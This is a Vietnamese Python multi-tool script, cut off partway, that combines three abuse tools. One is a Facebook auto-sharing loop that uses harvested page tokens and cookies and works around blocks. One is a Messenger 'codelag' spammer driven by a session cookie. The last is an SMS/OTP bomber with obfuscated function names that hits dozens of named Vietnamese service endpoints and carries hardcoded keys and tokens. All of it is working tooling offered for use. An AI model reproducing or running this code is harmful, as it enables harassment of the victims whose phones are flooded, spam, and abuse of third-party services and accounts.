import os
import sys
import requests
import aiohttp
import asyncio
import datetime
import time
import re
import random
import string
import json
import concurrent.futures
from threading import BoundedSemaphore
from rich.console import Console
from rich.table import Table
from rich.text import Text
from time import sleep
from colorama import Fore, Style # Giữ lại colorama cho phần spam SMS nếu cần

# --- Cài đặt Class Colors ---
class Colors:
    RED = '\033[1;31m'
    GREEN = '\033[1;32m'
    YELLOW = '\033[1;33m'
    BLUE = '\033[1;34m'
    PURPLE = '\033[1;35m'
    CYAN = '\033[1;36m'
    WHITE = '\033[1;37m'
    END = '\033[0m'

# --- Cài đặt Rich Console & Utils ---
console = Console()

def clear_screen():
    os.system('cls' if os.name == 'nt' else 'clear')

def main_banner():
    clear_screen()
    ban = Text("""
[ Bùi Đình Bình - TOOL GỘP ]
""")
    ban.stylize("bold bright_cyan on blue", 0, len(ban.plain)) 
    
    console.print(ban, justify="center")
    
    print(f"""
{Colors.PURPLE}╔═══════════════════════════════════════════════╗
{Colors.PURPLE}║               Bùi Đình Bình                   ║
{Colors.PURPLE}╚═══════════════════════════════════════════════╝

{Colors.WHITE}👑 Tool by: Bùi Đình Bình
{Colors.WHITE}📱 Zalo: 0377994308
{Colors.WHITE}⚡ Tool: Tool Gộp Đa Chức Năng
    """)

# ==============================================================================
# --- PHẦN 1: FACEBOOK SHARE LIÊN TỤC (TỪ l.py) ---
# ==============================================================================

success_count = 0
lock = asyncio.Lock() 

async def getid(session, link):
    async with session.post('https://id.traodoisub.com/api.php', data={"link": link}) as response:
        rq = await response.json()
        if 'success' in rq: return rq["id"]
        else: console.print(f"[red]Link post sai!!! Vui lòng nhập lại"); return None

async def get_token(session, token, cookie):
    params = {'access_token': token}
    headers = {'cookie': cookie, 'user-agent': 'Mozilla/5.0'}
    async with session.get('https://graph.facebook.com/me/accounts', params=params, headers=headers) as r:
        rq = await r.json()
        if 'data' in rq: return rq
        else: console.print(f"[red]Token Hoặc Cookie Sai! Lỗi khi lấy page cho token này. Vui lòng kiểm tra lại."); return {}

async def share_single_post(session, tk, ck, post, published_value):
    headers = {'cookie': ck, 'user-agent': 'Mozilla/5.0'}
    async with session.get(f'https://graph.facebook.com/me/feed?method=POST&link=https://m.facebook.com/{post}&published={published_value}&access_token={tk}', headers=headers) as response:
        json_data = await response.json()
        if 'id' in json_data: return True, json_data.get('id', 'N/A')
        else: return False, json_data.get('error', {}).get('message', 'Unknown error')

async def share_loop(session, tk, ck, post, page_id):
    global success_count
    current_published_status = 0
    consecutive_block_count = 0 
    
    while True:
        try:
            now = datetime.datetime.now()
            current_time = now.strftime("%H:%M:%S")
            is_success, result = await share_single_post(session, tk, ck, post, current_published_status)
            
            if is_success:
                async with lock:
                    success_count += 1
                    current_success_count = success_count
                consecutive_block_count = 0 
                console.print(f"[green]| Thành công | [magenta]{current_time} | [blue]{page_id} | [cyan]published={current_published_status} | [yellow]{current_success_count} |")
                
            else:
                consecutive_block_count += 1
                error_message = result 
                
                if consecutive_block_count == 1:
                    next_published_status = 1 if current_published_status == 0 else 0
                    console.print(f"[yellow]| Thất bại | [magenta]{current_time} | [blue]{page_id} | [red]published={current_published_status} | [yellow]Chuyển sang published={next_published_status} và thử lại... |")
                    current_published_status = next_published_status
                    await asyncio.sleep(1)
                    continue
                
                elif consecutive_block_count == 2:
                    current_published_status = 0
                    console.print(f"[red]| Thất bại 2 lần | [magenta]{current_time} | [blue]{page_id} | [red]Cả published=0 và published=1 đều bị chặn! Tạm dừng 30 phút. |")
                    await asyncio.sleep(1800)
                    consecutive_block_count = 0
                    continue

                console.print(f"[red]| Lỗi Share | [magenta]{current_time} | [blue] {page_id} | Lỗi: {error_message} | Thử lại sau 10 giây.")
                await asyncio.sleep(10)
                
        except Exception as e:
            console.print(f"| [red]Lỗi ngoại lệ | [magenta]{datetime.datetime.now().strftime('%H:%M:%S')} | [blue] {page_id} | [red]{e} | Thử lại sau 60 giây...")
            await asyncio.sleep(60)

async def run_share_tool(link, tokens_input, cookie_input):
    global success_count
    success_count = 0 
    async with aiohttp.ClientSession() as session:
        post = await getid(session, link)
        if not post: return

        tokens = [t.strip() for t in tokens_input.split('|') if t.strip()]
        cookies = [c.strip() for c in cookie_input.split('|') if c.strip()]
        
        if not tokens or not cookies:
            console.print(f"[red]Vui lòng nhập Token và Cookie hợp lệ.")
            return

        list_pages = []
        cookie_for_request = cookies[0] 
        
        for token in tokens:
            token_data = await get_token(session, token, cookie_for_request)
            
            if 'data' in token_data:
                for page in token_data['data']:
                    list_pages.append({"tk": page["access_token"], "page_id": page["id"], "ck": cookie_for_request})
        
        if not list_pages:
            console.print(f"[red]Không tìm thấy Page nào từ các token đã cung cấp.")
            return
            
        main_banner()
        console.print(f"[magenta]Tổng Số Token Page: [yellow]{len(list_pages)}")
        
        tasks = [asyncio.create_task(share_loop(session, page["tk"], page["ck"], post, page["page_id"])) for page in list_pages]
        
        await asyncio.gather(*tasks)

def start_share_tool():
    main_banner()
    console.print(f"{Colors.YELLOW}--- CHỨC NĂNG: FACEBOOK SHARE LIÊN TỤC (ASYNCHRONOUS) ---{Colors.END}")

    link = console.input("[green]Link Post: [yellow]")
    tokens_input = console.input(f"{Colors.GREEN}Nhập Token (Dùng dấu '|' để ngăn cách): [yellow]")
    cookie_input = console.input(f"{Colors.GREEN}Nhập Cookie (Chỉ cần 1 cookie để lấy page): [yellow]")
    
    try:
        # Kiểm tra nếu đang chạy trong môi trường Jupyter/IPython
        try:
            get_ipython()
            asyncio.run(run_share_tool(link, tokens_input, cookie_input))
        except NameError:
            # Nếu không phải Jupyter/IPython
            asyncio.run(run_share_tool(link, tokens_input, cookie_input))

    except KeyboardInterrupt:
        console.print("[yellow]Chương trình bị dừng bởi người dùng (Ctrl+C). Quay lại Menu chính.")
    except Exception as e:
        console.print(f"[red]Đã xảy ra lỗi không mong muốn: {e}")
    sleep(3)

# ==============================================================================
# --- PHẦN 2: CODELAG (TỪ l.py) ---
# ==============================================================================

class Messenger:
    def __init__(self, cookie):
        self.cookie = cookie
        self.user_id = self.get_user_id()
        self.fb_dtsg = None
        self.init_params()

    def get_user_id(self):
        try: return re.search(r"c_user=(\d+)", self.cookie).group(1)
        except: raise Exception("Cookie không hợp lệ")

    def init_params(self):
        headers = {'Cookie': self.cookie, 'User-Agent': 'Mozilla/5.0'}
        try:
            response = requests.get('https://m.facebook.com', headers=headers)
            match = re.search(r'name="fb_dtsg" value="(.*?)"', response.text)
            if match: self.fb_dtsg = match.group(1)
            else: raise Exception("Không tìm thấy fb_dtsg")
        except Exception as e: raise Exception(f"Lỗi khởi tạo: {str(e)}")

    def send_message(self, recipient_id, message):
        timestamp = int(time.time() * 1000)
        data = {
            'fb_dtsg': self.fb_dtsg, '__user': self.user_id, 'body': message,
            'action_type': 'ma-type:user-generated-message', 'timestamp': timestamp,
            'offline_threading_id': str(timestamp), 'message_id': str(timestamp),
            'thread_fbid': recipient_id, 'source': 'source:chat:web', 'client': 'mercury'
        }
        headers = {
            'Cookie': self.cookie, 'User-Agent': 'Mozilla/5.0',
            'Content-Type': 'application/x-www-form-urlencoded'
        }
        try:
            r = requests.post('https://www.facebook.com/messaging/send/', data=data, headers=headers)
            return r.status_code == 200
        except: return False

def run_codelag_tool():
    clear_screen()
    
    # Banner cho chức năng Code Lag
    banner_codelag = (        
        f"{Colors.CYAN}┌──────────────────────── Info ───────────────────────┐\n"
        f"{Colors.YELLOW} ➜ {Colors.WHITE}Admin⭐: Bình 💌(\n"
        f"{Colors.YELLOW} ➜ {Colors.WHITE}Zalo : 🔰0377994308.\n"
        f"{Colors.YELLOW} ➜ {Colors.WHITE}TOOL GỘP 🌠💬\n"
        f"{Colors.YELLOW} ➜ {Colors.WHITE}CHỨC NĂNG CODELAG⚔\n"
        f"{Colors.CYAN}└─────────────────────────────────────────────────────┘\n"
    )
    print(banner_codelag)

    group_id = console.input(f"{Colors.GREEN}-> ID Box: {Colors.WHITE}")
    cookie = console.input(f"{Colors.GREEN}-> Cookie Facebook: {Colors.WHITE}")
    
    try:
        delay = float(console.input(f"{Colors.GREEN}-> Delay (giây): {Colors.WHITE}"))
    except:
        delay = 5
        print(f"{Colors.YELLOW}Không nhập hoặc nhập sai, mặc định Delay: 5 giây.{Colors.END}")

    try:
        # Thử tìm codelag.txt ở thư mục hiện tại
        with open('codelag.txt', 'r', encoding='utf-8') as f:
            lines = f.readlines()
    except FileNotFoundError:
        print(f"{Colors.RED}Không tìm thấy file 'codelag.txt'. Vui lòng tạo file này và nhập nội dung cần spam.")
        sleep(3)
        return
    except Exception as e:
        print(f"{Colors.RED}Lỗi khi đọc file 'codelag.txt': {e}")
        sleep(3)
        return

    try:
        messenger = Messenger(cookie)
        for line in lines:
            message = line.strip()
            if message:
                success = messenger.send_message(group_id, message)
                print(f"{Colors.YELLOW}Gửi codelag: {message} => {Colors.GREEN if success else Colors.RED}{'Thành công' if success else 'Thất bại'}{Colors.END}")
                sleep(delay)
    except Exception as e:
        print(f"{Colors.RED}[LỖI] Xảy ra lỗi trong quá trình gửi: {e}{Colors.END}")

    sleep(3)

# ==============================================================================
# --- PHẦN 3: SMS SPAM (TỪ spamsms.py) ---
# ==============================================================================

MAX_THREADS = 18
semaphore = BoundedSemaphore(MAX_THREADS)
last_names = ['Nguyễn', 'Trần', 'Lê', 'Phạm', 'Võ', 'Hoàng']
middle_names = ['Vân', 'Thị', 'Quang', 'Hoàng', 'Anh', 'Thanh']
first_names = ['Nam', 'Tuấn', 'Hương', 'Linh', 'Long', 'Duy']

def OooOOo0O0oooO00OO0o0O():
    last_name = random.choice(last_names)
    middle_name = random.choice(middle_names) if random.choice([True, False]) else ''
    first_name = random.choice(first_names)
    return f"{last_name} {middle_name} {first_name}".strip()

# Các hàm SMS Spam (Được giữ nguyên và mã hóa tên)
# ... (Các hàm này được định nghĩa ở đây, ví dụ)
def XWXWWWXWWWXXXXXXWW(sdt):
    # Sapo
    try:
        response = requests.post('https://www.sapo.vn/fnb/sendotp', data={'phonenumber': sdt}, timeout=5)
        print(f"{Fore.GREEN}Sapo OTP response:{Style.RESET_ALL}", response.text)
    except Exception as e:
        print(f"{Fore.RED}Sapo OTP Error:{Style.RESET_ALL} {e}")

def lIlIlllllllIllIlI(sdt):
    # Viettel
    try:
        json_data = {'phone': sdt, 'typeCode': 'DI_DONG', 'actionCode': 'myviettel://login_mobile', 'type': 'otp_login'}
        response = requests.post('https://viettel.vn/api/getOTPLoginCommon', json=json_data, timeout=5)
        print(f"{Fore.GREEN}Viettel OTP response:{Style.RESET_ALL}", response.text)
    except Exception as e:
        print(f"{Fore.RED}Viettel OTP Error:{Style.RESET_ALL} {e}")

def S2S22SS22SSSSSSSSS2SS(sdt):
    # Medicare
    try:
        json_data = {'mobile': sdt, 'mobile_country_prefix': '84'}
        response = requests.post('https://medicare.vn/api/otp', json=json_data, timeout=5)
        print(f"{Fore.GREEN}Medicare OTP response:{Style.RESET_ALL}", response.text)
    except Exception as e:
        print(f"{Fore.RED}Medicare OTP Error:{Style.RESET_ALL} {e}")

def OODOOooDoOOoOoOooDD(sdt):
    # TV360
    try:
        json_data = {'msisdn': sdt}
        response = requests.post('https://tv360.vn/public/v1/auth/get-otp-login', json=json_data, timeout=5)
        print(f"{Fore.GREEN}TV360 OTP response:{Style.RESET_ALL}", response.text)
    except Exception as e:
        print(f"{Fore.RED}TV360 OTP Error:{Style.RESET_ALL} {e}")

def JIILIILJJILJJILJIILLJILI(sdt):
    # Điện Máy Xanh (Chỉ giữ lại phần POST OTP)
    try:
        data = {'phoneNumber': sdt, 'isReSend': 'false', 'sendOTPType': '1'}
        response = requests.post('https://www.dienmayxanh.com/lich-su-mua-hang/LoginV2/GetVerifyCode', data=data, timeout=5)
        print(f"{Fore.GREEN}Điện Máy Xanh OTP response:{Style.RESET_ALL}", response.text)
    except Exception as e:
        print(f"{Fore.RED}Điện Máy Xanh OTP Error:{Style.RESET_ALL} {e}")

def S222SSSSSS222S2SS2SS22222S(sdt):
    # Kingfoodmart
    try:
        json_data = {
            'operationName': 'SendOtp',
            'variables': {'input': {'phone': sdt, 'captchaSignature': 'HFMWt2IhJSLQ4zZ39DH0FSHgMLOxYwQwwZegMOc2R2RQwIQypiSQULVRtGIjBfOCdVY2k1VRh0VRgJFidaNSkFWlMJSF1kO2FNHkJkZk40DVBVJ2VuHmIiQy4AL15HVRhxWRcIGXcoCVYqWGQ2NWoPUxoAcGoNOQESVj1PIhUiUEosSlwHPEZ1BXlYOXVIOXQbEWJRGWkjWAkCUysD'}},
            'query': 'mutation SendOtp($input: SendOtpInput!) {\n  sendOtp(input: $input) {\n    otpTrackingId\n    __typename\n  }\n}',
        }
        response = requests.post('https://api.onelife.vn/v1/gateway/', json=json_data, timeout=5)
        print(f"{Fore.GREEN}Kingfoodmart OTP response:{Style.RESET_ALL}", response.text)
    except Exception as e:
        print(f"{Fore.RED}Kingfoodmart OTP Error:{Style.RESET_ALL} {e}")

def lIIllIlllIIllIIlIllI(sdt):
    # Mocha (video.mocha.com.vn)
    try:
        params = {'msisdn': sdt, 'languageCode': 'vi'}
        response = requests.post('https://apivideo.mocha.com.vn/onMediaBackendBiz/mochavideo/getOtp', params=params, timeout=5)
        print(f"{Fore.GREEN}Mocha OTP response:{Style.RESET_ALL}", response.text)
    except Exception as e:
        print(f"{Fore.RED}Mocha OTP Error:{Style.RESET_ALL} {e}")

def DOOOOoDDDOODDDDoDooO(sdt):
    # FPT Play (Register)
    try:
        json_data = {'phone': sdt, 'country_code': 'VN', 'client_id': 'vKyPNd1iWHodQVknxcvZoWz74295wnk8'}
        response = requests.post('https://api.fptplay.net/api/v7.1_w/user/otp/register_otp?st=HvBYCEmniTEnRLxYzaiHyg&e=1722340953&device=Microsoft%20Edge(version%253A127.0.0.0)&drm=1', json=json_data, timeout=5)
        print(f"{Fore.GREEN}FPT Play (Register) OTP response:{Style.RESET_ALL} OK") # Response text thường dài, in OK
    except Exception as e:
        print(f"{Fore.RED}FPT Play (Register) OTP Error:{Style.RESET_ALL} {e}")

def llIllIIIIlIlIIlIlIlll(sdt):
    # FPT Play (Reset Password)
    try:
        json_data = {'phone': sdt, 'country_code': 'VN', 'client_id': 'vKyPNd1iWHodQVknxcvZoWz74295wnk8'}
        response = requests.post('https://api.fptplay.net/api/v7.1_w/user/otp/reset_password_otp?st=0X65mEX0NBfn2pAmdMIC1g&e=1722365955&device=Microsoft%20Edge(version%253A127.0.0.0)&drm=1', json=json_data, timeout=5)
        print(f"{Fore.GREEN}FPT Play (Reset) OTP response:{Style.RESET_ALL} OK") # Response text thường dài, in OK
    except Exception as e:
        print(f"{Fore.RED}FPT Play (Reset) OTP Error:{Style.RESET_ALL} {e}")

def NMMNNNMMNMMMMNNNM(sdt):
    # VieON
    try:
        json_data = {'username': sdt, 'country_code': 'VN', 'model': 'Windows 10', 'device_id': 'f812a55d1d5ee2b87a927833df2608bc', 'device_name': 'Edge/127', 'device_type': 'desktop', 'platform': 'web', 'ui': '012021'}
        response = requests.post('https://api.vieon.vn/backend/user/v2/register?platform=web&ui=012021', json=json_data, timeout=5)
        print(f"{Fore.GREEN}VieON OTP response:{Style.RESET_ALL}", response.text)
    except Exception as e:
        print(f"{Fore.RED}VieON OTP Error:{Style.RESET_ALL} {e}")

def XWWWWXWXWXXXXXXWXXW(sdt):
    # GHN Express
    try:
        json_data = {'phone': sdt, 'type': 'register'}
        response = requests.post('https://online-gateway.ghn.vn/sso/public-api/v2/client/sendotp', json=json_data, timeout=5)
        print(f"{Fore.GREEN}GHN Express OTP response:{Style.RESET_ALL}", response.text)
    except Exception as e:
        print(f"{Fore.RED}GHN Express OTP Error:{Style.RESET_ALL} {e}")

def MNMNNNMNMNMNNNMMNNMN(sdt):
    # Lotte Mart
    try:
        json_data = {'username': sdt, 'case': 'register'}
        response = requests.post('https://www.lottemart.vn/v1/p/mart/bos/vi_bdg/V1/mart-sms/sendotp', json=json_data, timeout=5)
        print(f"{Fore.GREEN}Lotte Mart OTP response:{Style.RESET_ALL}", response.text)
    except Exception as e:
        print(f"{Fore.RED}Lotte Mart OTP Error:{Style.RESET_ALL} {e}")

def OO00OoO0o0Oo0ooOOo0OOO0o(sdt):
    # VayVND (Reset Password)
    try:
        json_data = {'login': sdt, 'trackingId': 'Kqoeash6OaH5e7nZHEBdTjrpAM4IiV4V9F8DldL6sByr7wKEIyAkjNoJ2d5sJ6i2'}
        response = requests.post('https://api.vayvnd.vn/v2/users/password-reset', json=json_data, timeout=5)
        print(f"{Fore.GREEN}VayVND OTP response:{Style.RESET_ALL}", response.text)
    except Exception as e:
        print(f"{Fore.RED}VayVND OTP Error:{Style.RESET_ALL} {e}")

def Oo0oO0ooooo0O000O0ooO(sdt):
    # Shopee
    try:
        json_data = {'operation': 8, 'phone': sdt, 'supported_channels': [1, 2, 3, 6, 0, 5], 'support_session': True}
        response = requests.post('https://shopee.vn/api/v4/otp/get_settings_v2', json=json_data, timeout=5)
        print(f"{Fore.GREEN}Shopee OTP response:{Style.RESET_ALL} OK")
    except Exception as e:
        print(f"{Fore.RED}Shopee OTP Error:{Style.RESET_ALL} {e}")

def LJIJIILJJJLIJLJJILJ(sdt):
    # Thế Giới Di Động
    try:
        data = {'phoneNumber': sdt, 'isReSend': 'false', 'sendOTPType': '1'}
        response = requests.post('https://www.thegioididong.com/lich-su-mua-hang/LoginV2/GetVerifyCode', data=data, timeout=5)
        print(f"{Fore.GREEN}TGDĐ OTP response:{Style.RESET_ALL}", response.text)
    except Exception as e:
        print(f"{Fore.RED}TGDĐ OTP Error:{Style.RESET_ALL} {e}")

def IlIIIlIlllIlIIlIlIlll(sdt):
    # FPT Shop
    try:
        json_data = {'fromSys': 'WEBKHICT', 'otpType': '0', 'phoneNumber': sdt}
        headers = {'apptenantid': 'E6770008-4AEA-4EE6-AEDE-691FD22F5C14', 'order-channel': '1', 'user-agent': 'Mozilla/5.0'}
        response = requests.post('https://papi.fptshop.com.vn/gw/is/user/new-send-verification', headers=headers, json=json_data, timeout=5)
        print(f"{Fore.GREEN}FPT Shop OTP response:{Style.RESET_ALL}", response.text)
    except Exception as e:
        print(f"{Fore.RED}FPT Shop OTP Error:{Style.RESET_ALL} {e}")

def IlIIlllIIlIIIIlIIllIll(sdt):
    # WinMart (Register)
    try:
        json_data = {'firstName': OooOOo0O0oooO00OO0o0O().split()[-1], 'phoneNumber': sdt, 'dobDate': '2000-02-05', 'gender': 'Male'}
        response = requests.post('https://api-crownx.winmart.vn/iam/api/v1/user/register', json=json_data, timeout=5)
        print(f"{Fore.GREEN}WinMart OTP response:{Style.RESET_ALL}", response.text)
    except Exception as e:
        print(f"{Fore.RED}WinMart OTP Error:{Style.RESET_ALL} {e}")

def ODoOODODDOOOOOODDoDDOO(sdt):
    # VietLoan (Resend)
    try:
        data = {'phone': sdt, '_token': 'XPEgEGJyFjeAr4r2LbqtwHcTPzu8EDNPB5jykdyi'}
        response = requests.post('https://vietloan.vn/register/phone-resend', data=data, timeout=5)
        print(f"{Fore.GREEN}VietLoan OTP response:{Style.RESET_ALL}", response.text)
    except Exception as e:
        print(f"{Fore.RED}VietLoan OTP Error:{Style.RESET_ALL} {e}")

def XXWXWWWXXXXXXWXXXWXXX(sdt):
    # Lozi (Mocha domain)
    try:
        json_data = {'countryCode': '84', 'phoneNumber': sdt}
        response = requests.post('https://mocha.lozi.vn/v1/invites/use-app', json=json_data, timeout=5)
        print(f"{Fore.GREEN}Lozi OTP response:{Style.RESET_ALL}", response.text)
    except Exception as e:
        print(f"{Fore.RED}Lozi OTP Error:{Style.RESET_ALL} {e}")

def OOoO0O0OO000Oo00OooO0O0o(sdt):
    # F88 (Pawn Loan)
    try:
        json_data = {'FullName': OooOOo0O0oooO00OO0o0O(), 'Phone': sdt, 'DistrictCode': '024', 'ProvinceCode': '02', 'AssetType': 'Car', 'IsChoose': '1', 'FormType': 1}
        response = requests.post('https://api.f88.vn/growth/webf88vn/api/v1/Pawn', json=json_data, timeout=5)
        print(f"{Fore.GREEN}F88 OTP response:{Style.RESET_ALL}", response.text)
    except Exception as e:
        print(f"{Fore.RED}F88 OTP Error:{Style.RESET_ALL} {e}")

def xxwxxxxxxxwwwxwwwxxxxwx(sdt):
    # Spacet
    try:
        json_data = {'phone': sdt}
        response = requests.post('https://api.spacet.vn/www/user/phone', json=json_data, timeout=5)
        print(f"{Fore.GREEN}Spacet OTP response:{Style.RESET_ALL}", response.text)
    except Exception as e:
        print(f"{Fore.RED}Spacet OTP Error:{Style.RESET_ALL} {e}")

def JLJLLIJJLJLJIIIIJLLLJJJJL(sdt):
    # Vinpearl
    try:
        json_data = {'channel': 'vpt', 'username': sdt, 'type': 1, 'OtpChannel': 1}
        response = requests.post('https://booking-identity-api.vinpearl.com/api/frontend/externallogin/send-otp', json=json_data, timeout=5)
        print(f"{Fore.GREEN}Vinpearl OTP response:{Style.RESET_ALL}", response.text)
    except Exception as e:
        print(f"{Fore.RED}Vinpearl OTP Error:{Style.RESET_ALL} {e}")

def oOOoDDDDoOoDoOoooO(sdt):
    # Traveloka (Signup)
    sdt_fmt = '+84' + sdt[1:] if sdt.startswith('0') else sdt
    try:
        json_data = {'fields': [], 'data': {'userLoginMethod': 'PN', 'username': sdt_fmt}, 'clientInterface': 'desktop'}
        response = requests.post('https://www.traveloka.com/api/v2/user/signup', json=json_data, timeout=5)
        print(f"{Fore.GREEN}Traveloka OTP response:{Style.RESET_ALL}", response.text)
    except Exception as e:
        print(f"{Fore.RED}Traveloka OTP Error:{Style.RESET_ALL} {e}")

def lIlIIIIIIIIlIlIIlllI(sdt):
    # DongPlus
    try:
        json_data = {'mobile_phone': sdt}
        response = requests.post('https://api.dongplus.vn/api/v2/user/check-phone', json=json_data, timeout=5)
        print(f"{Fore.GREEN}DongPlus OTP response:{Style.RESET_ALL}", response.text)
    except Exception as e:
        print(f"{Fore.RED}DongPlus OTP Error:{Style.RESET_ALL} {e}")

def XWWWWXWXXWXXXXXXWXW(sdt):
    # Nhà Thuốc Long Châu (OTP Type 0)
    try:
        json_data = {'phoneNumber': sdt, 'otpType': 0, 'fromSys': 'WEBKHLC'}
        response = requests.post('https://api.nhathuoclongchau.com.vn/lccus/is/user/new-send-verification', json=json_data, timeout=5)
        print(f"{Fore.GREEN}Long Châu (Type 0) OTP response:{Style.RESET_ALL}", response.text)
    except Exception as e:
        print(f"{Fore.RED}Long Châu (Type 0) OTP Error:{Style.RESET_ALL} {e}")

def O00oOoOo0O0Oo0OO00OO0(sdt):
    # Nhà Thuốc Long Châu (OTP Type 1)
    try:
        json_data = {'phoneNumber': sdt, 'otpType': 1, 'fromSys': 'WEBKHLC'}
        response = requests.post('https://api.nhathuoclongchau.com.vn/lccus/is/user/new-send-verification', json=json_data, timeout=5)
        print(f"{Fore.GREEN}Long Châu (Type 1) OTP response:{Style.RESET_ALL}", response.text)
    except Exception as e:
        print(f"{Fore.RED}Long Châu (Type 1) OTP Error:{Style.RESET_ALL} {e}")

def WWWWWWXWXWXWXXWWW(sdt):
    # Galaxy Play (Check Phone Only)
    try:
        params = {'phone': sdt}
        response = requests.post('https://api.glxplay.io/account/phone/checkPhoneOnly', params=params, timeout=5)
        print(f"{Fore.GREEN}Galaxy Play (Check) OTP response:{Style.RESET_ALL}", response.text)
    except Exception as e:
        print(f"{Fore.RED}Galaxy Play (Check) OTP Error:{Style.RESET_ALL} {e}")

def xxwxxxxxxxxwwwxwwwxxxxwx(sdt):
    # Emart Mall
    try:
        data = {'mobile': sdt}
        response = requests.post('https://emartmall.com.vn/index.php?route=account/register/smsRegister', data=data, timeout=5)
        print(f"{Fore.GREEN}Emart Mall OTP response:{Style.RESET_ALL}", response.text)
    except Exception as e:
        print(f"{Fore.RED}Emart Mall OTP Error:{Style.RESET_ALL} {e}")

def IllIIlIIIlIIlIIlIlI(sdt):
    # Ahamove
    try:
        json_data = {'mobile': sdt, 'country_code': 'VN', 'firebase_sms_auth': True}
        response = requests.post('https://api.ahamove.com/api/v3/public/user/login', json=json_data, timeout=5)
        print(f"{Fore.GREEN}Ahamove OTP response:{Style.RESET_ALL}", response.text)
    except Exception as e:
        print(f"{Fore.RED}Ahamove OTP Error:{Style.RESET_ALL} {e}")

def xxwwwxwwwwxwxwwxxx(sdt):
    # ACheckin (Request Voice OTP)
    try:
        url2 = "https://id.acheckin.vn/api/graphql/v2/mobile"
        payload3 = json.dumps({
        "operationName": "RequestVoiceOTP",
        "variables": {"phone_number": sdt, "action": "REGISTER", "hash": "6af5e4ed78ee57fe21f0d405c752798f"},
        "query": "mutation RequestVoiceOTP($phone_number: String!, $action: REQUEST_VOICE_OTP_ACTION!, $hash: String!) {\n  requestVoiceOTP(phone_number: $phone_number, action: $action, hash: $hash)\n}\n"
        })
        headers2 = {'User-Agent': "AppotaHome/29 CFNetwork/1474 Darwin/23.0.0", 'Content-Type': "application/json"}
        response = requests.post(url2, data=payload3, headers=headers2, timeout=5)
        print(f"{Fore.GREEN}ACheckin (Voice) OTP response:{Style.RESET_ALL}", response.text)
    except Exception as e:
        print(f"{Fore.RED}ACheckin (Voice) OTP Error:{Style.RESET_ALL} {e}")

def IIIIIIlIIIlIIIIlIllIIIlII(sdt):
    # Appota Wallet (Get Verify Code - SMS)
    try:
        url3 = "https://api.gw.ewallet.appota.com/v2/users/register/get_verify_code"
        payload3 = json.dumps({"phone_number": sdt, "sender": "SMS", "ts": 1722417441, "signature": "5a17345149daf29d917de285cf0bf202457576b99c68132e158237f5caec85a5"})
        headers3 = {'User-Agent': "appota_wallet_v2/119 CFNetwork/1474 Darwin/23.0.0", 'Content-Type': "application/json"}
        response = requests.post(url3, data=payload3, headers=headers3, timeout=5)
        print(f"{Fore.GREEN}Appota OTP response:{Style.RESET_ALL}", response.text)
    except Exception as e:
        print(f"{Fore.RED}Appota OTP Error:{Style.RESET_ALL} {e}")

def lljjjjliiiljijljli(sdt):
    # Watsons (Registration OTP)
    try:
        url = "https://www10.watsons.vn/api/v2/wtcvn/forms/mobileRegistrationForm/steps/wtcvn_mobileRegistrationForm_step1/validateAndPrepareNextStep?lang=vi"
        payload = json.dumps({"otpTokenRequest": {"action": "REGISTRATION", "type": "SMS", "countryCode": "84", "target": sdt}, "defaultAddress": {"mobileNumberCountryCode": "84", "mobileNumber": sdt}, "mobileNumber": sdt})
        response = requests.post(url, data=payload, timeout=5)
        print(f"{Fore.GREEN}Watsons OTP response:{Style.RESET_ALL} OK")
    except Exception as e:
        print(f"{Fore.RED}Watsons OTP Error:{Style.RESET_ALL} {e}")

def liljliiiijijljljl(sdt):
    # Hoang Phuc (Send OTP)
    try:
        data = {'action_type': '1', 'tel': sdt}
        response = requests.post('https://hoang-phuc.com/advancedlogin/otp/sendotp/', data=data, timeout=5)
        print(f"{Fore.GREEN}Hoang Phuc OTP response:{Style.RESET_ALL} OK")
    except Exception as e:
        print(f"{Fore.RED}Hoang Phuc OTP Error:{Style.RESET_ALL} {e}")

def O0O0OOoOoO0oOoOOOOoo0oOOO0(sdt):
    # FM.COM.VN
    try:
        json_data = {'Phone': sdt, 'LatOfMap': '106', 'LongOfMap': '108', 'Browser': ''}
        headers = {'x-apikey': 'X2geZ7rDEDI73K1vqwEGStqGtR90JNJ0K4sQHIrbUI3YISlv'}
        response = requests.post('https://api.fmplus.com.vn/api/1.0/auth/verify/send-otp-v2', headers=headers, json=json_data, timeout=5)
        print(f"{Fore.GREEN}FM.COM.VN OTP response:{Style.RESET_ALL}", response.text)
    except Exception as e:
        print(f"{Fore.RED}FM.COM.VN OTP Error:{Style.RESET_ALL} {e}")

def NMNMMMMNMNMNMMNMNN(sdt):
    # Reebok VN
    try:
        json_data = {'phoneNumber': sdt}
        headers = {'key': '63ea1845891e8995ecb2304b558cdeab', 'timestamp': '1722425836500'}
        response = requests.post('https://reebok-api.hsv-tech.io/client/phone-verification/request-verification', headers=headers, json=json_data, timeout=5)
        print(f"{Fore.GREEN}Reebok OTP response:{Style.RESET_ALL}", response.text)
    except Exception as e:
        print(f"{Fore.RED}Reebok OTP Error:{Style.RESET_ALL} {e}")

def DOooOoOOOODoODoooDO(sdt):
    # The Face Shop
    try:
        json_data = {'phoneNumber': sdt}
        headers = {'key': 'c3ef5fcbab3e7ebd82794a39da791ff6', 'timestamp': '1722425954937'}
        response = requests.post('https://tfs-api.hsv-tech.io/client/phone-verification/request-verification', headers=headers, json=json_data, timeout=5)
        print(f"{Fore.GREEN}The Face Shop OTP response:{Style.RESET_ALL}", response.text)
    except Exception as e:
        print(f"{Fore.RED}The Face Shop OTP Error:{Style.RESET_ALL} {e}")

def S22SSS2SSSS22222SSS22(sdt):
    # Beauty Box
    try:
        json_data = {'phoneNumber': sdt}
        headers = {'key': 'ac41e98f028aa44aac947da26ceb7cff', 'timestamp': '1722426119478'}
        response = requests.post('https://beautybox-api.hsv-tech.io/client/phone-verification/request-verification', headers=headers, json=json_data, timeout=5)
        print(f"{Fore.GREEN}Beauty Box OTP response:{Style.RESET_ALL}", response.text)
    except Exception as e:
        print(f"{Fore.RED}Beauty Box OTP Error:{Style.RESET_ALL} {e}")

def IIIIllllIllIIIIllIIIllI(sdt):
    # WinMart (Register) - Lặp lại, dùng cho trường hợp khác
    try:
        json_data = {'firstName': OooOOo0O0oooO00OO0o0O().split()[-1], 'phoneNumber': sdt, 'dobDate': '2000-02-05', 'gender': 'Male'}
        response = requests.post('https://api-crownx.winmart.vn/iam/api/v1/user/register', json=json_data, timeout=5)
        print(f"{Fore.GREEN}WinMart 2 OTP response:{Style.RESET_ALL}", response.text)
    except Exception as e:
        print(f"{Fore.RED}WinMart 2 OTP Error:{Style.RESET_ALL} {e}")

def IIllIllIlllIlllII(sdt):
    # Futabus/Vato
    try:
